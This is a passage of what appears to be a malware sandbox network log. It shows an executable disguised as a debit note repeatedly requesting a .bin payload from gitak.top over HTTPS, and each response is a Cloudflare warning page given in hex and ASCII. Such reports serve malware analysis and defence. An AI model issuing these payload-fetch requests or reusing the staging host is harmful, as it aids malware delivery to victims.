2024-08-26 13:35:02 UTC	545	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:35:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GKEfmx%2BR7ECSHq8E8UkoyF0%2F4nBasR5QU%2BcYl5QmaLoooHbZs1%2BM5JJtN4Mxb8O%2Bx7b%2F7eCReOxq9DysI0vlyPRXKSNdN1CyDAY7zT5QrB22SornH1JORcrESEc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9433e74e2920a5-IAD
2024-08-26 13:35:02 UTC	824	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:35:02 UTC	1369	IN	Data Raw: 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 Data Ascii: ors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-ale
2024-08-26 13:35:02 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 64 76 67 36 31 4f 33 4b 4e 6b 47 34 71 36 5a 46 4c 37 73 45 51 74 72 6d 36 61 70 67 71 79 5f 61 37 48 50 62 6a 44 46 7a 38 62 67 2d 31 37 32 34 36 37 39 33 30 32 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 Data Ascii: <input type="hidden" name="atok" value="dvg61O3KNkG4q6ZFL7sEQtrm6apgqy_a7HPbjDFz8bg-1724679302-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-bt
2024-08-26 13:35:02 UTC	856	IN	Data Raw: 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 Data Ascii: rator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudf
2024-08-26 13:35:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.11.20	49834	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:35:12 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:35:12 UTC	537	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:35:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wmR6pLZrWnIod2ck7HuKOOZ8015crQFhmM0lkKwme7by40PV1ASqUzP%2FHHJxdwnv%2BIR95R2NdXUPigfEXvnlB43IB1uGyJWxlfBED0XMdd9qJFCrLu2aUfOCv8s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9434291b9e3adc-IAD
2024-08-26 13:35:12 UTC	832	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:35:12 UTC	1369	IN	Data Raw: 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 Data Ascii: ss" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:35:12 UTC	1369	IN	Data Raw: 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 77 6f 66 67 4d 55 41 34 39 65 33 36 6b 79 75 41 4e 31 72 2e 33 6e 6f 4e 58 7a 52 75 37 57 6f 6f 76 48 6a 48 64 75 4d 70 5a 66 38 2d 31 37 32 34 36 37 39 33 31 32 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 Data Ascii: nput type="hidden" name="atok" value="wofgMUA49e36kyuAN1r.3noNXzRu7WoovHjHduMpZf8-1724679312-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style
2024-08-26 13:35:12 UTC	848	IN	Data Raw: 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e Data Ascii: :hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a>
2024-08-26 13:35:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.11.20	49835	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:35:23 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:35:23 UTC	539	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:35:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ZcpdRH3XhJ%2FTAleYUX%2FbERQzKH4DnZ9ouA1HJtSmm58yz0aH1BWGtBpwfjhG4WgqxTr0G%2BoT8I9GA5ab7vW5jFcr4V12hSCjJAFm3kNQKV5gdVgJuZOje2oL08%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b94346aefc95a69-IAD
2024-08-26 13:35:23 UTC	830	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:35:23 UTC	1369	IN	Data Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:35:23 UTC	1369	IN	Data Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 6f 58 6b 38 47 49 6c 4b 78 6c 59 63 4e 66 53 30 75 78 63 62 4d 57 6d 75 6a 73 75 67 47 55 75 6c 77 34 6e 77 6d 34 32 30 74 58 34 2d 31 37 32 34 36 37 39 33 32 33 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 Data Ascii: <input type="hidden" name="atok" value="oXk8GIlKxlYcNfS0uxcbMWmujsugGUulw4nwm420tX4-1724679323-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
2024-08-26 13:35:23 UTC	850	IN	Data Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
2024-08-26 13:35:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.11.20	49836	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:35:33 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:35:33 UTC	543	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:35:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=blPq4WdX%2B20eEutSCW5w8ETn6elc0kh%2FbHbk7KiVy00YB8h%2F%2FMNmjn77%2BSpAmPZxEZK9RUwpb4ZEbojJR5rZ6YeNbOWG71x1mOm0RX6flbf5pqwveE3s8pPAINM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9434acac2ec940-IAD
2024-08-26 13:35:33 UTC	826	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:35:33 UTC	1369	IN	Data Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
2024-08-26 13:35:33 UTC	1369	IN	Data Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 67 67 36 4b 67 50 35 5a 46 4c 6f 66 7a 62 6c 6d 5f 37 6e 44 79 72 6d 32 4f 4b 43 33 68 4a 62 51 62 2e 6c 2e 4f 63 43 61 79 6d 51 2d 31 37 32 34 36 37 39 33 33 33 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 Data Ascii: <input type="hidden" name="atok" value="gg6KgP5ZFLofzblm_7nDyrm2OKC3hJbQb.l.OcCaymQ-1724679333-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-08-26 13:35:33 UTC	854	IN	Data Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 Data Ascii: tor sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
2024-08-26 13:35:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.11.20	49837	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:35:44 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
